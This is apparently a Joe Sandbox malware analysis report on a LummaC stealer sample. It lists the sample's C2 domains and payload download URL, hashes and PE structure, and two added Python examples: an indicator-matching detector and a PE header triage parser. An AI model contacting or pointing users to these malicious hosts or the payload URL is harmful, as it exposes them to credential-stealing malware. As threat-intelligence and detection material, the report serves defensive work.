https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi | file.exe, file.exe, 00000000.00000003.1759077269.0000000000709000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1756778602.0000000000704000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://x1.c.lencr.org/0 | file.exe, 00000000.00000003.1742224060.000000000512B000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://x1.i.lencr.org/0 | file.exe, 00000000.00000003.1742224060.000000000512B000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install | file.exe, 00000000.00000003.1712232842.0000000005122000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | file.exe, 00000000.00000003.1712394447.0000000005139000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://crisiwarny.store/v8hs | file.exe, 00000000.00000003.1793207907.00000000006F5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2064513836.0000000000700000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1759143782.00000000006F9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1786059361.00000000006FE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1781336814.00000000006FE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1759468384.00000000006FE000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://support.mozilla.org/products/firefoxgro.all | file.exe, 00000000.00000003.1743350143.000000000521B000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://crisiwarny.store/x | file.exe, 00000000.00000003.1793344937.000000000510C000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
http://185.215.113.16/Q= | file.exe, 00000000.00000003.2086064735.00000000006BF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2086762508.00000000006C1000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://crisiwarny.store:443/apitxtPK | file.exe, 00000000.00000002.2086588158.000000000065F000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://crisiwarny.store/u | file.exe, 00000000.00000003.1756778602.0000000000704000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1741732815.0000000000704000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1742430669.0000000000704000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1781336814.00000000006FE000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | file.exe, 00000000.00000003.1712394447.0000000005139000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://presticitpo.store:443/api | file.exe, 00000000.00000002.2086588158.000000000065F000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | file.exe, 00000000.00000003.1712394447.0000000005139000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://crl.rootca1.amazontrust.com/rootca1.crl0 | file.exe, 00000000.00000003.1742224060.000000000512B000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://crisiwarny.store/s://crisiwarny.store/apit | file.exe, 00000000.00000003.2064902373.00000000006DE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2064714160.00000000006D7000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://ocsp.rootca1.amazontrust.com0: | file.exe, 00000000.00000003.1742224060.000000000512B000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016 | file.exe, 00000000.00000003.1712232842.0000000005147000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1712165908.000000000514E000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://crisiwarny.store/apibu | file.exe, 00000000.00000003.1793207907.00000000006F5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2064513836.0000000000700000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://www.ecosia.org/newtab/ | file.exe, 00000000.00000003.1712394447.0000000005139000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br | file.exe, 00000000.00000003.1743350143.000000000521B000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://ac.ecosia.org/autocomplete?q= | file.exe, 00000000.00000003.1712394447.0000000005139000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://185.215.113.16/ | file.exe, 00000000.00000003.2086064735.00000000006BF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2086762508.00000000006C1000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://185.215.113.16:80/off/def.exe | file.exe, 00000000.00000002.2086588158.000000000065F000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://crisiwarny.store/H | file.exe, 00000000.00000003.1793344937.000000000510C000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://support.microsof | file.exe, 00000000.00000003.1712165908.0000000005150000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
http://crt.rootca1.amazontrust.com/rootca1.cer0? | file.exe, 00000000.00000003.1742224060.000000000512B000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://crisiwarny.store/api9 | file.exe, 00000000.00000003.1793004274.0000000005102000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://crisiwarny.store/0 | file.exe, 00000000.00000002.2089716142.000000000510C000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
http://185.215.113.16/off/def.exe | file.exe, 00000000.00000002.2086588158.0000000000672000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2086360372.000000000019A000.00000004.00000010.00020000.00000000.sdmp, file.exe, 00000000.00000003.2086064735.00000000006BF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2086762508.00000000006C1000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://crisiwarny.store/ | file.exe, 00000000.00000003.1741732815.0000000000704000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1793344937.000000000510C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.2086762508.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2089716142.000000000510C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2085807683.00000000006D7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1711799765.00000000006DE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1781336814.00000000006FE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1711943208.00000000006DE000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples | file.exe, 00000000.00000003.1712232842.0000000005122000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | file.exe, 00000000.00000003.1712394447.0000000005139000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                                                                                      • No. of IPs < 25%
                                                                                      • 25% < No. of IPs < 50%
                                                                                      • 50% < No. of IPs < 75%
                                                                                      • 75% < No. of IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
172.67.170.64 | crisiwarny.store | United States | | 13335 | CLOUDFLARENETUS | true
185.215.113.16 | unknown | Portugal | | 206894 | WHOLESALECONNECTIONSNL | false
                                                                                      Joe Sandbox version:41.0.0 Charoite
Analysis ID: 1543216
Start date and time: 2024-10-27 13:02:07 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 4m 6s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 4
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: file.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@1/0@4/2
EGA Information: Failed
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 0
• Number of non-executed functions: 1
Cookbook Comments:
• Found application associated with file extension: .exe
• Stop behavior analysis, all processes terminated
• Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target file.exe, PID 7472, because there are no executed functions
• Not all processes were analyzed; the report is missing behavior information
• Report size getting too big, too many NtOpenKeyEx calls found
• Report size getting too big, too many NtQueryValueKey calls found
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: file.exe
Time      Type             Description
08:02:59  API Interceptor  65x Sleep call for process: file.exe modified
Match: 172.67.170.64 (IP)
Associated Sample Name / URL                      Detection   Threat Name          Context
file.exe                                          malicious   LummaC
file.exe                                          malicious   LummaC
file.exe                                          malicious   LummaC
file.exe                                          malicious   LummaC
file.exe                                          malicious   LummaC
file.exe                                          malicious   LummaC
file.exe                                          malicious   LummaC
file.exe                                          malicious   LummaC
file.exe                                          malicious   LummaC
file.exe                                          malicious   LummaC

Match: 185.215.113.16 (IP)
Associated Sample Name / URL                      Detection   Threat Name          Context
file.exe                                          malicious   LummaC               185.215.113.16/off/def.exe
file.exe                                          malicious   LummaC               185.215.113.16/off/def.exe
SecuriteInfo.com.Win32.Evo-gen.20836.29869.exe    malicious   LummaC               185.215.113.16/off/def.exe
file.exe                                          malicious   LummaC               185.215.113.16/off/def.exe
file.exe                                          malicious   LummaC               185.215.113.16/off/def.exe
file.exe                                          malicious   LummaC               185.215.113.16/off/def.exe
file.exe                                          malicious   LummaC               185.215.113.16/off/def.exe
S92Ayq3U9A.exe                                    malicious   LummaC               185.215.113.16/off/def.exe
file.exe                                          malicious   LummaC               185.215.113.16/off/def.exe
D18h1ni3ZU.exe                                    malicious   LummaC               185.215.113.16/off/def.exe

Match: crisiwarny.store (domain)
Associated Sample Name / URL                      Detection   Threat Name          Context
file.exe                                          malicious   LummaC               104.21.95.91
file.exe                                          malicious   LummaC               172.67.170.64
file.exe                                          malicious   LummaC               172.67.170.64
file.exe                                          malicious   LummaC               104.21.95.91
file.exe                                          malicious   LummaC               172.67.170.64
file.exe                                          malicious   LummaC               172.67.170.64
file.exe                                          malicious   LummaC               172.67.170.64
file.exe                                          malicious   LummaC               172.67.170.64
file.exe                                          malicious   LummaC               172.67.170.64
file.exe                                          malicious   LummaC               172.67.170.64

Match: CLOUDFLARENETUS (ASN)
Associated Sample Name / URL                      Detection   Threat Name          Context
file.exe                                          malicious   LummaC               104.21.95.91
file.exe                                          malicious   LummaC               172.67.170.64
file.exe                                          malicious   LummaC               172.67.170.64
nklm68k.elf                                       malicious   Unknown              172.68.224.89
splarm7.elf                                       malicious   Unknown              141.101.119.135
nabx86.elf                                        malicious   Unknown              104.21.62.94
SecuriteInfo.com.Win32.Evo-gen.20836.29869.exe    malicious   LummaC               188.114.97.3
splx86.elf                                        malicious   Unknown              104.27.44.51
file.exe                                          malicious   LummaC               104.21.95.91
sh4.elf                                           malicious   Mirai                1.3.103.28

Match: WHOLESALECONNECTIONSNL (ASN)
Associated Sample Name / URL                      Detection   Threat Name          Context
file.exe                                          malicious   LummaC               185.215.113.16
file.exe                                          malicious   Stealc, Vidar        185.215.113.206
file.exe                                          malicious   Stealc               185.215.113.206
file.exe                                          malicious   LummaC               185.215.113.16
file.exe                                          malicious   Stealc, Vidar        185.215.113.206
SecuriteInfo.com.Win32.Evo-gen.20836.29869.exe    malicious   LummaC               185.215.113.16
file.exe                                          malicious   LummaC               185.215.113.16
file.exe                                          malicious   Stealc               185.215.113.206
file.exe                                          malicious   Stealc, Vidar        185.215.113.206
file.exe                                          malicious   LummaC               185.215.113.16

Match: a0e9f5d64349fb13191bc781f81f42e1 (JA3 SSL client fingerprint)
Associated Sample Name / URL                      Detection   Threat Name          Context
file.exe                                          malicious   LummaC               172.67.170.64
file.exe                                          malicious   LummaC               172.67.170.64
file.exe                                          malicious   LummaC               172.67.170.64
SecuriteInfo.com.Win32.Evo-gen.20836.29869.exe    malicious   LummaC               172.67.170.64
file.exe                                          malicious   LummaC               172.67.170.64
file.exe                                          malicious   LummaC               172.67.170.64
file.exe                                          malicious   LummaC               172.67.170.64
https://duy38.r.ag.d.sendibm3.com/mk/cl/f/sh/1t6Af4OiGsF30wT9TF4ckLf3fAzx5z/28D7HenRXzOU
                                                  malicious   LummaC               172.67.170.64
order confirmation.exe                            malicious   DBatLoader, FormBook 172.67.170.64
Flech.exe                                         malicious   LummaC               172.67.170.64

No context
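The context tables above tie this sample to other LummaC reports through two kinds of indicator. Some are specific to the operator: 185.215.113.16 and the payload URL 185.215.113.16/off/def.exe, and the domain crisiwarny.store. Others are shared infrastructure and are weak on their own: 172.67.170.64 and 104.21.95.91 are Cloudflare anycast addresses (the same ASN context lists unrelated Mirai ELF samples), and the JA3 hash a0e9f5d64349fb13191bc781f81f42e1 also appears with DBatLoader/FormBook. A detection that weights all of these equally will either miss the C2 hiding behind Cloudflare or page on every visit to a Cloudflare-fronted site. The following is an added example and not part of the Joe Sandbox report: a small Python matcher that scores connection records against the report's indicators, weighting each by how specific it is. The log format and the log lines are constructed for the example; the CDN prefixes are an assumption taken from Cloudflare's published IPv4 ranges and should be checked against the current list before use.

```python
import ipaddress
from typing import Dict, List, Tuple

# Indicators copied from the report's IP / domain / ASN / JA3 context tables.
IOC_DOMAINS = {"crisiwarny.store"}
IOC_URLS = {"185.215.113.16/off/def.exe"}
IOC_IPS = {"185.215.113.16", "172.67.170.64", "104.21.95.91"}
IOC_JA3 = {"a0e9f5d64349fb13191bc781f81f42e1"}

# Assumption: shared-CDN prefixes from Cloudflare's published IPv4 list.
# An IP hit inside these only proves "talked to Cloudflare"; match on SNI/Host instead.
SHARED_CDN = [ipaddress.ip_network(p) for p in
              ("104.16.0.0/12", "172.64.0.0/13", "188.114.96.0/20")]

SEVERITY = {"none": 0, "low": 1, "medium": 2, "high": 3}


def is_shared_cdn(ip: str) -> bool:
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in SHARED_CDN)


def normalize_url(url: str) -> str:
    """Drop the scheme so 'http://host/path' compares equal to the report's 'host/path'."""
    for scheme in ("http://", "https://"):
        if url.startswith(scheme):
            return url[len(scheme):]
    return url


def score_record(rec: Dict[str, str]) -> List[Tuple[str, str]]:
    """Return (severity, reason) findings for one connection record."""
    findings = []
    if rec["sni"] in IOC_DOMAINS:
        findings.append(("high", "SNI/Host matches reported C2 domain " + rec["sni"]))
    url = normalize_url(rec["url"])
    if url in IOC_URLS:
        findings.append(("high", "URL matches reported payload URL " + url))
    if rec["dst"] in IOC_IPS:
        if is_shared_cdn(rec["dst"]):
            findings.append(("low", rec["dst"] + " is reported but sits in a shared CDN range"))
        else:
            findings.append(("medium", "destination " + rec["dst"] + " is reported C2/payload infrastructure"))
    if rec["ja3"] in IOC_JA3:
        findings.append(("low", "JA3 matches, but the same hash is seen with unrelated families"))
    return findings


def parse_log(text: str) -> List[Dict[str, str]]:
    """Constructed tab-separated format: ts, src, dst, dport, sni, ja3, url ('-' = absent)."""
    lines = [ln for ln in text.splitlines() if ln.strip()]
    header = lines[0].split("\t")
    return [dict(zip(header, ln.split("\t"))) for ln in lines[1:]]


def triage_logs(text: str) -> List[Dict[str, object]]:
    """Score every record; the verdict is the strongest single finding."""
    out = []
    for rec in parse_log(text):
        findings = score_record(rec)
        verdict = max((sev for sev, _ in findings), key=SEVERITY.__getitem__, default="none")
        out.append({"src": rec["src"], "dst": rec["dst"], "verdict": verdict,
                    "reasons": [reason for _, reason in findings]})
    return out


# Constructed connection records (not from the report's PCAP).
SAMPLE_LOG = """\
ts\tsrc\tdst\tdport\tsni\tja3\turl
1730030000\t10.0.0.5\t172.67.170.64\t443\tcrisiwarny.store\ta0e9f5d64349fb13191bc781f81f42e1\t-
1730030001\t10.0.0.5\t185.215.113.16\t80\t-\t-\thttp://185.215.113.16/off/def.exe
1730030002\t10.0.0.7\t104.21.95.91\t443\tassets.example.net\ta0e9f5d64349fb13191bc781f81f42e1\t-
1730030003\t10.0.0.9\t93.184.216.34\t443\texample.com\t-\t-
"""

if __name__ == "__main__":
    for hit in triage_logs(SAMPLE_LOG):
        print(hit["src"], "->", hit["dst"], hit["verdict"], "; ".join(hit["reasons"]))
```

The third record shows the point: a Cloudflare IP from the report plus a JA3 match is still only "low", because both indicators are shared with benign traffic; the first record is "high" on the SNI alone, which is where the domain-level indicator earns its keep.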
No created / dropped files found
File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 6.561363833308581
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: file.exe
File size: 2'921'984 bytes
MD5: 5c0022dd6f83870f6a81faf362383ae3
SHA1: a34e622e2bafbbbc107bb7311681516126838e90
SHA256: 1df402c5bd54c8b600ba43b0c94ff494786617d2276aec771af24202b310ac63
SHA512: 9d21dd922b4d25f46629fff1500b67d37f949cefa43c7c68425fffe6c722b5efed46eb0a2eb45ce58e8180cb870ae5e3b4c2f0408a222fb80be8b892afdea840
SSDEEP: 24576:V7Y+ff17BER73cd+z0v/nDH1vPXTNfHb+1oOT9wvUj82tsGF2gKZ0xL7DVHSv9:VT7KJZwnnb6oTM6GFBKMHE
TLSH: 35D54B62F405F1CBD88B17789127CE826E5E82F9471149C3E86CA47B7EB3CC525B6E24
File Content Preview: MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...S..g.................J............/...........@.........................../......l-...@.................................T...h..
Icon Hash: 90cececece8e8eb0
Entrypoint: 0x6fa000
Entrypoint Section: .taggant
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp: 0x6715D353 [Mon Oct 21 04:06:43 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 6
OS Version Minor: 0
File Version Major: 6
File Version Minor: 0
Subsystem Version Major: 6
Subsystem Version Minor: 0
Import Hash: 2eabe9054cad5152567f0699947a2c5b
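The static fields above are what a triage script should pull out before anything is executed: the entry point 0x6fa000 sits in a section named .taggant rather than .text, which is the basis for the "Entry point lies outside standard sections" signature, and the link timestamp 0x6715D353 decodes to 2024-10-21 04:06:43 UTC, six days before the analysis. The following is an added example, not Joe Sandbox's code and not the sample's: a minimal PE header parser in pure Python (struct only, no pefile) that locates the section containing the entry point, flags an entry point in a non-standard or trailing section and a writable-and-executable entry section, and decodes the timestamp. It runs on a constructed header that copies only the report's image base, entry address, timestamp and section name; the section layout, sizes and characteristics are assumptions and are not the real file's.

```python
import struct
from datetime import datetime, timezone

# Section names a normal linker puts the entry point in. Anything else
# (for example a packer-appended ".taggant") deserves a second look.
STANDARD_CODE_SECTIONS = {".text", ".code", "CODE", "INIT", ".init", "TEXT"}

IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_WRITE = 0x80000000


def parse_pe(data: bytes) -> dict:
    """Parse just enough of a PE image to find the entry point and the section table."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    machine, nsections, timestamp, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", data, coff)
    opt = coff + 20
    magic = struct.unpack_from("<H", data, opt)[0]
    entry_rva = struct.unpack_from("<I", data, opt + 16)[0]
    if magic == 0x10B:          # PE32: 32-bit ImageBase at optional-header offset 28
        image_base = struct.unpack_from("<I", data, opt + 28)[0]
    elif magic == 0x20B:        # PE32+: 64-bit ImageBase at optional-header offset 24
        image_base = struct.unpack_from("<Q", data, opt + 24)[0]
    else:
        raise ValueError("unknown optional header magic 0x%x" % magic)
    sections = []
    for i in range(nsections):
        name, vsize, rva, rawsize, _, _, _, _, _, chars = struct.unpack_from(
            "<8sIIIIIIHHI", data, opt + opt_size + i * 40)
        sections.append({"name": name.rstrip(b"\0").decode("ascii", "replace"),
                         "rva": rva, "size": max(vsize, rawsize), "chars": chars})
    return {"machine": machine, "timestamp": timestamp, "image_base": image_base,
            "entry_rva": entry_rva, "sections": sections}


def entry_section(pe: dict):
    """Return the section whose RVA range contains the entry point, or None."""
    for s in pe["sections"]:
        if s["rva"] <= pe["entry_rva"] < s["rva"] + s["size"]:
            return s
    return None


def triage(data: bytes) -> dict:
    """Static checks behind the report's 'Entry point lies outside standard sections'."""
    pe = parse_pe(data)
    sec = entry_section(pe)
    name = sec["name"] if sec else None
    return {
        "entry_va": pe["image_base"] + pe["entry_rva"],
        "entry_section": name,
        "entry_nonstandard": name not in STANDARD_CODE_SECTIONS,
        "entry_is_last_section": bool(sec) and sec is pe["sections"][-1],
        "entry_section_wx": bool(sec and sec["chars"] & IMAGE_SCN_MEM_WRITE
                                 and sec["chars"] & IMAGE_SCN_MEM_EXECUTE),
        "compiled": datetime.fromtimestamp(pe["timestamp"], timezone.utc)
                            .strftime("%Y-%m-%d %H:%M:%S UTC"),
    }


def build_sample_pe() -> bytes:
    """Constructed stand-in for the sample's headers: the report's ImageBase, entry
    point, timestamp and '.taggant' entry section. Layout and sizes are assumed."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)                       # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x14C, 4, 0x6715D353, 0, 0, 0xE0, 0x0102)
    opt = bytearray(0xE0)
    struct.pack_into("<H", opt, 0, 0x10B)                         # PE32 magic
    struct.pack_into("<I", opt, 16, 0x2FA000)                     # AddressOfEntryPoint
    struct.pack_into("<I", opt, 28, 0x400000)                     # ImageBase
    layout = [(b".text", 0x1000, 0x60000020), (b".rdata", 0x2000, 0x40000040),
              (b".data", 0x3000, 0xC0000040), (b".taggant", 0x2FA000, 0x60000020)]
    secs = b"".join(struct.pack("<8sIIIIIIHHI", n, 0x1000, rva, 0x1000, 0x400, 0, 0, 0, 0, c)
                    for n, rva, c in layout)
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt) + secs


if __name__ == "__main__":
    for key, value in triage(build_sample_pe()).items():
        print("%22s: %s" % (key, hex(value) if type(value) is int else value))
```

On the real file the same checks give entry_va 0x6fa000 and entry_section .taggant; the writable-and-executable flag is a static proxy only, since the report's "changes PE section rights" finding comes from watching VirtualProtect at run time, which a header parser cannot see.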
Instruction
jmp 00007FAD40EE42FAh
pcmpeqb mm5, qword ptr [eax+eax]
add byte ptr [eax], al
add byte ptr [eax], al
jmp 00007FAD40EE62F5h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
| Name | Virtual Address | Virtual Size | Is in Section |
|---|---|---|---|
| IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IMPORT | 0x5a054 | 0x68 | .idata |
| IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x5a1f8 | 0x8 | .idata |
| IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | |
| Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
|---|---|---|---|---|---|---|---|---|---|
| (empty name) | 0x1000 | 0x58000 | 0x27e00 | 7af5a303bcea093f74115666b8dec17f | False | 0.9979611579153606 | data | 7.97730443522952 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .rsrc | 0x59000 | 0x1000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .idata | 0x5a000 | 0x1000 | 0x200 | 555a11fa24a077379003c187d9c9d020 | False | 0.14453125 | data | 0.9996515881509258 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| aqmxsaio | 0x5b000 | 0x29e000 | 0x29e000 | a47b0967cabd67a248a19faf1cf1a4ee | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| zdfqzxlh | 0x2f9000 | 0x1000 | 0x400 | 188c23b44a4e2049b23a8fa49511b7ef | False | 0.7939453125 | data | 6.2184228343254055 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
